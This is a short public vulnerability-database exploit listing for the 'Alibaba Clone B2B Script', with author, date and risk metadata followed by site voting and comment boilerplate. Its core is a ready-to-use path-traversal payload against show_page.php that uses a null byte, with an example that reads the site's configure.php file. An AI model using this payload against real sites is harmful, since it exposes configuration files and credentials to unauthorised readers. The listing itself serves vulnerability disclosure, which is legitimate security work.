Alibaba Clone B2B Script File Read Vulnerability

2016.06.24

Credit: Meisam Monsef

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
# Date: 2016-06-22
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions
# Tested on: CentOS and Windows
Exploit :
http://site/show_page.php?page=../[FilePath]%00
Example :
http://site/show_page.php?page=../configure.php%00

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Alibaba Clone B2B Script File Read Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.